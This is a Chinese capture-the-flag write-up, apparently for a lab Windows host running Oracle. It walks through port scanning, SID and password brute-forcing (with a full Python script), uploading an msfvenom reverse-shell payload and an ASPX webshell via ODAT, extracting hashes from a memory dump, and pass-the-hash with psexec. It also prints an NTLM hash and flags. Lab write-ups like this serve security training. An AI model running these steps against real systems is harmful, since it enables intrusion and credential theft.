Oracle数据库渗透测试与权限提升综合指南<\/h1>

信息收集阶段<\/h2>

1. 端口扫描与识别<\/h3>
使用Nmap进行全端口扫描：<\/p>
nmap -p- 10.10.10.82 --min-rate 1000<\/span> -sC -sV -Pn
<\/span><\/span><\/code><\/pre>发现的关键端口：<\/p>

80\/tcp: Microsoft IIS httpd 8.5<\/li>
135\/tcp: Microsoft Windows RPC<\/li>
139\/tcp: netbios-ssn<\/li>
445\/tcp: microsoft-ds (Windows Server 2008 R2 - 2012)<\/li>
1521\/tcp: Oracle TNS listener 11.2.0.2.0 (未授权)<\/li>
49160\/tcp: Oracle TNS listener (需要服务名)<\/li>
<\/ul>
Oracle数据库攻击<\/h2>
1. SID枚举<\/h3>
使用Metasploit模块爆破Oracle SID：<\/p>
msfconsole
<\/span><\/span>use admin\/oracle\/sid_brute
<\/span><\/span>set RHOSTS 10.10.10.82
<\/span><\/span>run
<\/span><\/span><\/code><\/pre>发现的潜在SID：<\/p>

XE<\/li>
XEXDB<\/li>
PLSExtProc<\/li>
CLRExtProc<\/li>
<\/ul>
2. 用户密码枚举<\/h3>
使用Python脚本爆破Oracle用户凭据：<\/p>
#!\/usr\/bin\/env python<\/span>
<\/span><\/span>import<\/span> cx_Oracle
<\/span><\/span>import<\/span> sys
<\/span><\/span>from<\/span> multiprocessing import<\/span> Pool
<\/span><\/span>
<\/span><\/span>MAX_PROC =<\/span> 50<\/span>
<\/span><\/span>host =<\/span> "10.10.10.82"<\/span>
<\/span><\/span>sid =<\/span> "XE"<\/span>
<\/span><\/span>
<\/span><\/span>def<\/span> scan<\/span>(userpass):
<\/span><\/span>    u, p =<\/span> userpass.<\/span>split(':'<\/span>)[:2<\/span>]
<\/span><\/span>    try<\/span>:
<\/span><\/span>        conn =<\/span> cx_Oracle.<\/span>connect('<\/span>{user}<\/span>\/<\/span>{pass_}<\/span>@<\/span>{ip}<\/span>\/<\/span>{sid}<\/span>'<\/span>.<\/span>format(
<\/span><\/span>            user=<\/span>u, pass_=<\/span>p, ip=<\/span>host, sid=<\/span>sid))
<\/span><\/span>        return<\/span> u, p, True<\/span>
<\/span><\/span>    except<\/span> cx_Oracle.<\/span>DatabaseError:
<\/span><\/span>        return<\/span> u, p, False<\/span>
<\/span><\/span>
<\/span><\/span>def<\/span> main<\/span>(host, userpassfile, nprocs=<\/span>MAX_PROC):
<\/span><\/span>    with<\/span> open(userpassfile, 'r'<\/span>) as<\/span> f:
<\/span><\/span>        userpass =<\/span> f.<\/span>read().<\/span>rstrip().<\/span>replace('<\/span>\r<\/span>'<\/span>,''<\/span>).<\/span>split('<\/span>\n<\/span>'<\/span>)
<\/span><\/span>    
<\/span><\/span>    pool =<\/span> Pool(processes=<\/span>nprocs)
<\/span><\/span>    for<\/span> username, pass_, status in<\/span> pool.<\/span>imap_unordered(scan, [up for<\/span> up in<\/span> userpass]):
<\/span><\/span>        if<\/span> status:
<\/span><\/span>            print("Found <\/span>{}<\/span> \/ <\/span>{}<\/span>\n\n<\/span>"<\/span>.<\/span>format(username, pass_))
<\/span><\/span>        else<\/span>:
<\/span><\/span>            sys.<\/span>stdout.<\/span>write("<\/span>\r<\/span> <\/span>{}<\/span>\/<\/span>{}<\/span> "<\/span>.<\/span>format(username, pass_))
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> '__main__'<\/span>:
<\/span><\/span>    if<\/span> len(sys.<\/span>argv) !=<\/span> 3<\/span>:
<\/span><\/span>        print("<\/span>{}<\/span> [ip] [wordlist]"<\/span>.<\/span>format(sys.<\/span>argv[0<\/span>]))
<\/span><\/span>        print(" wordlist should be of the format [username]:[password]"<\/span>)
<\/span><\/span>        sys.<\/span>exit(1<\/span>)
<\/span><\/span>    main(sys.<\/span>argv[1<\/span>], sys.<\/span>argv[2<\/span>])
<\/span><\/span><\/code><\/pre>成功获取的凭据：<\/p>

SCOTT:tiger<\/li>
<\/ul>
3. 数据库权限利用<\/h3>
使用ODAT工具进行权限检查：<\/p>
odat all -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba
<\/span><\/span><\/code><\/pre>发现具有写文件和执行权限。<\/p>
3.1 上传反向Shell<\/h4>
生成payload：<\/p>
msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=<\/span>10.10.16.24 LPORT=<\/span>10032<\/span> -f exe -o \/tmp\/reverse_shell.exe --encoder x86\/shikata_ga_nai
<\/span><\/span><\/code><\/pre>上传并执行：<\/p>
odat utlfile -s 10.10.10.82 --sysdba -d XE -U scott -P tiger --putFile C:\/ reverse_shell.exe \/tmp\/reverse_shell.exe
<\/span><\/span>odat externaltable -s 10.10.10.82 --sysdba -d XE -U scott -P tiger --exec c:\/reverse_shell.exe
<\/span><\/span><\/code><\/pre>3.2 上传WebShell<\/h4>
更隐蔽的方法：<\/p>
odat utlfile -s 10.10.10.82 --sysdba -d XE -U scott -P tiger --putFile C:\/inetpub\/wwwroot shell.aspx \/usr\/share\/webshells\/aspx\/cmdasp.aspx
<\/span><\/span><\/code><\/pre>权限提升<\/h2>
1. 内存取证<\/h3>
从Dropbox链接获取内存转储文件(SILO-20180105-221806.dmp)<\/p>
使用Volatility进行分析：<\/p>
识别系统profile：<\/p>
sudo docker run --rm -it -v \/tmp:\/tmp phocean\/volatility vol.py kdbgscan -f \/tmp\/SILO-20180105-221806.dmp
<\/span><\/span><\/code><\/pre>获取注册表hive列表：<\/p>
sudo docker run --rm -it -v \/tmp:\/tmp phocean\/volatility vol.py -f \/tmp\/SILO-20180105-221806.dmp --profile Win2012R2x64 hivelist
<\/span><\/span><\/code><\/pre>提取哈希：<\/p>
sudo docker run --rm -it -v \/tmp:\/tmp phocean\/volatility vol.py -f \/tmp\/SILO-20180105-221806.dmp --profile Win2012R2x64 hashdump -y 0xffffc00000028000 -s 0xffffc00000619000
<\/span><\/span><\/code><\/pre>获取的NTLM哈希：<\/p>
aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7
<\/code><\/pre>
2. 哈希传递攻击<\/h3>
使用Impacket工具进行哈希传递：<\/p>
impacket-psexec administrator@10.10.10.82 -hashes aad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7
<\/span><\/span><\/code><\/pre>关键文件<\/h2>

User.txt: ae508318075a2c95be891b11d8c79212<\/li>
Root.txt: ef0298798ac15279f3b3aec8e4aa14e8<\/li>
<\/ul>
总结的技术要点<\/h2>


Oracle数据库渗透流程：<\/p>

SID枚举 → 用户爆破 → 权限检查 → 文件操作\/命令执行<\/li>
<\/ul>
<\/li>

权限提升方法：<\/p>

内存取证获取哈希 → 哈希传递攻击<\/li>
<\/ul>
<\/li>

关键工具：<\/p>

Nmap<\/li>
Metasploit (sid_brute模块)<\/li>
ODAT (Oracle数据库攻击工具)<\/li>
Volatility (内存取证)<\/li>
Impacket (哈希传递攻击)<\/li>
<\/ul>
<\/li>

防御建议：<\/p>

加强Oracle数据库默认凭据<\/li>
限制UTL_FILE等危险权限<\/li>
启用强密码策略<\/li>
禁用NTLM认证或启用Credential Guard<\/li>
<\/ul>
<\/li>
<\/ol>